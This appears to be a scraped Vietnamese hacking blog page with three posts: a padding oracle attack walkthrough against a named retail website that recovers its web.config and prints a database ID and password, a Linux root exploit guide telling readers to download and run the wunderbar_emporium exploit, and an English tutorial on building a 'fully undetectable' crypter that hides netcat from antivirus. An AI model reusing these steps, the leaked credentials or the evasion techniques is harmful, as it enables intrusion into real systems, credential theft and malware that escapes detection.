<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br clear="all" /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;">Chờ đợi tầm 30 phút chương trình sẽ giải mã ra giá trị sau:</span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<blockquote class="tr_bq" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<div class="MsoNoSpacing">
<span style="background-color: black;">M0-Q6vb5oiWPYJMC3WdcQgAAAAAAAAAA0</span></div>
</blockquote>
<span style="background-color: black;"><br style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;" /></span>
<div class="separator" style="clear: both; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCA-n1QlqDInCrcdfJHuY0Um98RQIbUO19ChSqNUDLKwViPFQKWdfisQDAAdAYZpRRnLEG_OksHSAHPP6fwjcwzGml1zk_bJtd1fG8W9nF9ff46DqOojhuXbuYTVWHXndIIALcD219tvRV/s1600/16.png" imageanchor="1" style="background-color: black; color: #444444; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCA-n1QlqDInCrcdfJHuY0Um98RQIbUO19ChSqNUDLKwViPFQKWdfisQDAAdAYZpRRnLEG_OksHSAHPP6fwjcwzGml1zk_bJtd1fG8W9nF9ff46DqOojhuXbuYTVWHXndIIALcD219tvRV/s640/16.png" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-top-left-radius: 0px; border-top-right-radius: 0px; border: 1px solid transparent; box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; padding: 8px; position: relative;" width="536" /></a></div>
<span style="background-color: black;"><br style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;" /></span>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
</div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;">Sau khi có giá trị kết quả giải mã, thực hiện tiếp câu lệnh:</span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<blockquote class="tr_bq" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<div class="MsoNoSpacing">
<span style="background-color: black;">Web.config_bruter.pl http://bigc.vn/WebResource.axd M0-Q6vb5oiWPYJMC3WdcQgAAAAAAAAAA0 8</span></div>
</blockquote>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;">Đợi chương trình biên dịch xong ( Tầm 1 tiếng ) ta sẽ có kết quả như sau: </span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="separator" style="clear: both; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0KaMUhx3gOYdn5SQSc159-mkNbcocuH9jnFvMreJGRzMC-esAzI0r09wsuSTZGwFnrk4Ramlfh_bwptI8QTzZ1_9kuglYgTgs6LKqnXTs34te-38qrWA06fzk4bkeI-vPBI4BR3CvEaor/s1600/17.png" imageanchor="1" style="background-color: black; color: #444444; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="638" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0KaMUhx3gOYdn5SQSc159-mkNbcocuH9jnFvMreJGRzMC-esAzI0r09wsuSTZGwFnrk4Ramlfh_bwptI8QTzZ1_9kuglYgTgs6LKqnXTs34te-38qrWA06fzk4bkeI-vPBI4BR3CvEaor/s640/17.png" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-top-left-radius: 0px; border-top-right-radius: 0px; border: 1px solid transparent; box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; padding: 8px; position: relative;" width="640" /></a></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;">Kết quả: </span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<blockquote class="tr_bq" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<div class="MsoNoSpacing">
<span style="background-color: black;"> u2LzoCD0ZcozT5Dq9vm iJY9gkwLdZ1xCAAAAAAAAAAA1</span></div>
<div class="MsoNoSpacing">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing">
<span style="background-color: black;"> gPdbQmmzWIEzT5Dq9vmiJY9gkwLdZ1xCAAAAAAAAAAA1</span></div>
</blockquote>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;">Mỗi lần biên dịch, chương trình sẽ cho ra 1 giá trị khác nhau nhưng link đều đưa về cùng 1 kết quả</span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
</div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: red; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<b style="background-color: black;">Bước 3: Lấy thông tin file config:</b></div>
<div class="MsoNoSpacing" style="color: red; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<a href="http://bigc.vn/ScriptResource.axd?d=gPdbQmmzWIEzT5Dq9vmiJY9gkwLdZ1xCAAAAAAAAAAA1" style="background-color: black; color: #444444; text-decoration: none;">http://bigc.vn/ScriptResource.axd?d=gPdbQmmzWIEzT5Dq9vmiJY9gkwLdZ1xCAAAAAAAAAAA1</a></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;">hoặc:</span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<a href="http://bigc.vn/ScriptResource.axd?d=u2LzoCD0ZcozT5Dq9vm%20iJY9gkwLdZ1xCAAAAAAAAAAA1" style="background-color: black; color: #444444; text-decoration: none;">http://bigc.vn/ScriptResource.axd?d=u2LzoCD0ZcozT5Dq9vm%20iJY9gkwLdZ1xCAAAAAAAAAAA1</a></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<blockquote class="tr_bq" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<pre><span style="background-color: black;">Ta được thông tin sau: ID=<span style="color: red;">bigc</span>;Password=<span style="color: red;">RrmX6W6ODi</span></span></pre>
</blockquote>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
</div>
<div class="separator" style="clear: both; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnSCITTdNON64fDVP2kk31Wp_9Wk8UdSx6pdEhCGEsqu9lKTAKUQgkCVOTlQyqhgMiOfFFFMfgFPyNdZcTnzCpLRiXpNU1K6Ar83prX3eBCsQt5BxTcFF-hbu2O1tFZolSREF8tEMgtTvH/s1600/18.png" imageanchor="1" style="background-color: black; color: #444444; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnSCITTdNON64fDVP2kk31Wp_9Wk8UdSx6pdEhCGEsqu9lKTAKUQgkCVOTlQyqhgMiOfFFFMfgFPyNdZcTnzCpLRiXpNU1K6Ar83prX3eBCsQt5BxTcFF-hbu2O1tFZolSREF8tEMgtTvH/s640/18.png" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-top-left-radius: 0px; border-top-right-radius: 0px; border: 1px solid transparent; box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; padding: 8px; position: relative;" width="640" /></a></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: red; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<b style="background-color: black;">Bước 4: login vào Database</b></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;">Sử dụng tool: MySQL management studio express</span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<a href="http://www.scottsystems.com/products/maxxtraxx_ce/downloads/" style="background-color: black; color: #444444; text-decoration: none;">http://www.scottsystems.com/products/maxxtraxx_ce/downloads/</a></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
</div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="separator" style="clear: both; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAGT10mrOQPwgN70fE0NBALqNyuG1ooHtUb3XsLNfUG9isOGSZ-TSr8ojg6H5F9qWI3VwqbXX_K0yoTir6NJrsWAaYRn0TVLZkguirXun5XoT6bARtjXEvqIn11CPPknJu85eIPv2hZxBK/s1600/19.png" imageanchor="1" style="background-color: black; color: #444444; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAGT10mrOQPwgN70fE0NBALqNyuG1ooHtUb3XsLNfUG9isOGSZ-TSr8ojg6H5F9qWI3VwqbXX_K0yoTir6NJrsWAaYRn0TVLZkguirXun5XoT6bARtjXEvqIn11CPPknJu85eIPv2hZxBK/s640/19.png" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-top-left-radius: 0px; border-top-right-radius: 0px; border: 1px solid transparent; box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; padding: 8px; position: relative;" width="640" /></a></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="separator" style="clear: both; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXuBv5hpRcpnyh4SOtQDFi4go33LJpaiEucC4x0jyYFd56TXpRCc1u1hD9MirADZ1GFza34Q55yPCOdiiWW_TwmeG_E6shkQQvY7fZaNb7IF_sJPPs8tLhrNGQsOb3SOMq6pRBDBkfXnXj/s1600/15.png" imageanchor="1" style="background-color: black; color: #444444; margin-left: 1em; margin-right: 1em; text-decoration: none;"><br /></a></div>
<span style="background-color: black;"><br style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;" /></span>
<div class="separator" style="clear: both; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZHCbSpfQkMAYQNdgmsNnfI0YQJlN3FPRYGMEbLgvPv0w4TXNTQwe4hTSelypNmnE5X2KE33mpWmdbgHh6zCPCADRI4ZA13boKIb3qXQPYBH4r_UNVRq1WJIsGqQUczz0py7ICRfOQ7nOV/s1600/20.png" imageanchor="1" style="background-color: black; color: #444444; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="382" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZHCbSpfQkMAYQNdgmsNnfI0YQJlN3FPRYGMEbLgvPv0w4TXNTQwe4hTSelypNmnE5X2KE33mpWmdbgHh6zCPCADRI4ZA13boKIb3qXQPYBH4r_UNVRq1WJIsGqQUczz0py7ICRfOQ7nOV/s640/20.png" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-top-left-radius: 0px; border-top-right-radius: 0px; border: 1px solid transparent; box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; padding: 8px; position: relative;" width="640" /></a></div>
<div class="MsoNoSpacing" style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<span style="background-color: black;"><br /></span></div>
<div class="MsoNoSpacing" style="background-color: #141414; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;">
<br /></div>

Padding Orale Attack

Victim: http://bigc.vn/ Kiểm tra lỗi Padding Orale View source: Chú ý đoạn code sau: /WebResource.axd?d=Opd...

Cách chiếm quyền Root trên linux

<span style="background-color: black; color: white;">Đầu tiên bạn cần copy 3 file này về đã nhé:</span><br />
<span style="background-color: black; color: white;"><br /></span>
<span style="background-color: black; color: white;"><br /></span>
<span style="background-color: black; color: white;">file <strong class="final-path" style="font-family: Helvetica, arial, freesans, clean, sans-serif; font-size: 18px; line-height: 25px;">wunderbar_emporium.sh:<br /><a href="https://github.com/kevinkma/wunderbar_emporium/blob/master/wunderbar_emporium.sh">https://github.com/kevinkma/wunderbar_emporium/blob/master/wunderbar_emporium.sh</a><br /><br />file: </strong><strong class="final-path" style="font-family: Helvetica, arial, freesans, clean, sans-serif; font-size: 18px; line-height: 25px;">exploit.c<br /><a href="https://github.com/kevinkma/wunderbar_emporium/blob/master/exploit.c">https://github.com/kevinkma/wunderbar_emporium/blob/master/exploit.c</a><br /><br />file: </strong><strong class="final-path" style="font-family: Helvetica, arial, freesans, clean, sans-serif; font-size: 18px; line-height: 25px;">pwnkernel.c<br /><a href="https://github.com/kevinkma/wunderbar_emporium/blob/master/pwnkernel.c">https://github.com/kevinkma/wunderbar_emporium/blob/master/pwnkernel.c</a></strong></span><br />
<div>
<span style="background-color: black; color: white;"><br /></span></div>
<div>
<span style="background-color: black; color: white;"><br /></span></div>
<div>
<span style="background-color: black; color: white;">khi copy xong 3 file bạn thực hiện các lệnh:</span><br />
<span style="background-color: black; color: white;"> chmod +x <strong class="final-path" style="font-family: Helvetica, arial, freesans, clean, sans-serif; font-size: 18px; line-height: 25px;">wunderbar_emporium.sh</strong></span></div>
<div>
<span style="background-color: black; color: white;"><strong class="final-path" style="font-family: Helvetica, arial, freesans, clean, sans-serif; font-size: 18px; line-height: 25px;">./</strong><strong class="final-path" style="font-family: Helvetica, arial, freesans, clean, sans-serif; font-size: 18px; line-height: 25px;">wunderbar_emporium.sh</strong></span></div>

Cách chiếm quyền Root trên linux

Đầu tiên bạn cần copy 3 file này về đã nhé: file wunderbar_emporium.sh: https://github.com/kevinkma/wunderbar_emporium/blob/master/wunde...

Crypter Bypassing Antivirus how-to For Beginners

<h3 class="post-title entry-title" itemprop="name" style="background-color: #050505; color: #cfcdcd; font-family: Georgia, Times, serif; font-size: 23px; line-height: 1.2em; margin: 0.25em 0px 0px; padding: 0px 0px 4px;">
[Virus] Crypter Bypassing Antivirus how-to For Beginners</h3>
<span class="Apple-style-span" style="background-color: #050505; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; line-height: 18.1875px;">Ok my dear IT-boys, accompanied with naughty IT-girls: this is the long-promised article about how to bypass the antivirus protection. I hope you already after the previous article: Self-modifying code - short overview for beginners, so you know this-and-that about pointers, windows API, breaks, debugging, etc.</span><br />
<div align="center" style="background-color: #050505; color: #cacac9; font-family: Georgia, serif; font-size: 13px; line-height: 18.1875px; margin: 0px; padding: 0px;">
<span class="Apple-style-span" style="color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px;"><img alt="" border="0" src="http://itsecuritylab.eu/wp-content/uploads/2010/09/crypter_FUD_teaser.png" style="border: 0px; clear: both; max-width: 800px; min-width: 220px; padding: 10px;" /></span></div>
<span class="Apple-style-span" style="background-color: #050505; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; line-height: 18.1875px;"><br />Now we gonna try to create something interesting by ourselves. We will create a fully working crypter: a program which allows to run any third-party (and potentially malicious) code the way it will not be detected by antivirus program. We are ambitious beasts, so we will "raise a bar" and try to create FUD Crypter (stands for: Fully Undetectable). :-) Still don't get it? See this video to have a taste of what this story will be about:</span><br />
<div align="center" style="background-color: #050505; color: #cacac9; font-family: Georgia, serif; font-size: 13px; line-height: 18.1875px; margin: 0px; padding: 0px;">
<center>
<span class="Apple-style-span" style="color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px;"><a href="http://www.youtube.com/watch?v=xTYdhUyt3Fg" style="color: #417394; text-decoration: none;" target="_blank">http://www.youtube.com/watch?v=xTYdhUyt3Fg</a></span></center>
</div>
<span class="Apple-style-span" style="background-color: #050505; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; line-height: 18.1875px;"><br />Before we will go further - one small reminder:<br /><br />Information in this article is prepared for better understanding of malware mechanisms, developing hacker defense attitude among the users and help preventing the hacking attacks. You may experiment on your own computer ONLY, at your own risk and responsibility.<br /><br />Ok, it seems you got it now. :-) Even more: you want to understand how you can do the same thing, right? But for the beginning we have to find out what is so important for the antiviruses? How they detect malware? What actually they are looking for?...<br /><br />So you downloaded some warez.exe and double-clicked it. This is what happening next:<br /><br />AV's Point of view<br /><br />Phase one: before the malicious (or suspicious) program is executed<br /><br />The first thing an antivirus is doing - it's checking if the program is packed. If it is packed - the appropriate unpacker should be used and the code and data should be expanded to memory and then disassembled. In a meantime our AV may also check and resolve an API imports so it would be known then: what API functions are used. I don't want to go deep into details what Portable Executable (or PE) format is, but generally - compiled code is copied to memory almost one-to-one as it is in the binary file. So our antivirus is looking there for a opcodes of certain API calls, speciall data strings (like: "P0wNeD by WiLd HakCer" or famous: "All your base is belong to us") and many other interesting things. Generally antivirus software is looking for a certain suspicious-looking binary code patterns or so-called "signatures". If such thing is found (a pattern or combination of patterns): our antivirus is immediately popping-up a nice red-colored window, (featuring a pride of GUI team: bug.jpg) with information that "malicious code was successfully stopped".<br /><br />Phase two: while the program is running<br /><br />It is obvious that some (malicious) code may be hidden, encrypted, obfuscated or even created "on-the-fly". To be able to deal with such tricks our antivirus is also capable to monitor and intercept API calls (uses hooks) and does a kind of "behavioral analysis". So if your notepad.exe for some strange reason is trying to do some "naughty" things (e.g. access memory of another process) - this means well... "something is fishy" and our famous red-colored window appears on a horizon again.<br /><br />The project<br /><br />This is actually a proof of concept: how surprisingly easy you may create a code which will be able to bypass antivirus protection. Our "guinea pig" will be the well-known Netcat for windows (...so the cat becomes pig...). ;-) This program is good enough because it is happily detected by many antiviruses as a malware (and this is exactly what we need now).<br /><br />You already know that I have no passion for reinventing a wheel, so I used one of existing projects as a template (btw, you may find hundreds of them in Internet). The original code is actually an n-th clone of Simple crypter for beginner by Xash, naturally in Delphi. Using this Crypter "as it is" nowadays is pointless because the code is old and whatever it does - is immediately detected by all modern antiviruses. The original idea however is nice and elegant. This is how it works:<br /><br />You point the Crypter to your malicious software (netcat: netcat.exe) and run. The Crypter produces another executable: let's call it nc_crypted.exe. This is the structure of this file:</span><br />
<div align="center" style="background-color: #050505; color: #cacac9; font-family: Georgia, serif; font-size: 13px; line-height: 18.1875px; margin: 0px; padding: 0px;">
<span class="Apple-style-span" style="color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px;"><img alt="" border="0" src="http://itsecuritylab.eu/wp-content/uploads/2010/09/crypter_example_012.png" style="border: 0px; clear: both; max-width: 800px; min-width: 220px; padding: 10px;" /></span></div>
<span class="Apple-style-span" style="background-color: #050505; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; line-height: 18.1875px;"><br />So the netcat is placed in the "tale" of our binary, located in between two markers. Markers are needed, because the length of the decryption routine (so called: stub) may vary and the length of the payload (in our case: netcat.exe) can be variable too. The payload may be copied as it is (which is stupid of course, because would contain dozen of signatures detected by antiviruses) or encrypted (e.g.: XOR'ed).<br /><br />Now real cool stuff begins. Once you click netcat_crypted.exe, it is loaded to the computer's memory and executed. Then it creates all structures needed to run the brand new (malicious) process directly in memory. The new process is created in "suspended" state. Now our stub decrypts the netcat code, takes it as an array of bytes and fills appropriate structures prepared for the new process. By this way, the new malicious code appears in computer's memory in fully legitimate way in a kind of "frozen" condition. This can be done with or without touching the hard drive which may make detection even more difficult. Once everything is ready - it's enough to call the process and our netcat is executed!<br /><br />Everything is sweet, but there is a big problem: the loader (stub) produced by the original Crypter is already "well-known" to antiviruses. :-( So we must do some modifications in the code to make the binary significantly different from the original. What people are doing often (with minimal success):<br /><br />* Adding junk code for modifying execution flows.<br />* Changing or encrypting strings.<br />* Changing variable names.<br />* Changing the order of all code aspects.<br />* Adding or changing icon.<br /><br />But be are tough guys, right :-) So we will try to do something even more advanced:<br /><br />* We will encrypt all string variables and also the payload with industry standard data encryption algorithm (so forget about lousy XOR).<br />* We will obfuscate all "suspicious" API function calls.<br />* We will make the length of all elements of the "tail" fully variable, hence unpredictable.<br />* We will clean-up the final binary from all unnecessary strings and hidden resources which potentially may be treated by antiviruses as signatures.<br /><br />Look at the structure of netcat_crypted.exe now:</span><br />
<div align="center" style="margin: 0px; padding: 0px;">
<img alt="" border="0" src="http://itsecuritylab.eu/wp-content/uploads/2010/09/crypter_structere_02.png" style="border: 0px; clear: both; max-width: 800px; min-width: 220px; padding: 10px;" /></div>
<span class="Apple-style-span" style="background-color: #050505; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; line-height: 18.1875px;">Our final netcat_crypted.exe is slightly more complicated now, isn't it. We will be using Serpent symmetric key block cipher algorithm for data encryption. Delimiters will be random, and with various length.<br /><br />We already know about runtime API address resolution from the previous article, - this knowledge will be needed in our case. API function names are acting as virus signatures (in certain combination), because they are plain strings. So we definitely need to hide them. To obfuscate API function names there was additional program written, called StringsEncoder, which can be downloaded from [here]. This is an example of processing a one string constant only (CreateProcessA):</span><br />
<div align="center" style="margin: 0px; padding: 0px;">
<img alt="" border="0" src="http://itsecuritylab.eu/wp-content/uploads/2010/09/stringsEncrypter.png" style="border: 0px; clear: both; max-width: 800px; min-width: 220px; padding: 10px;" /></div>
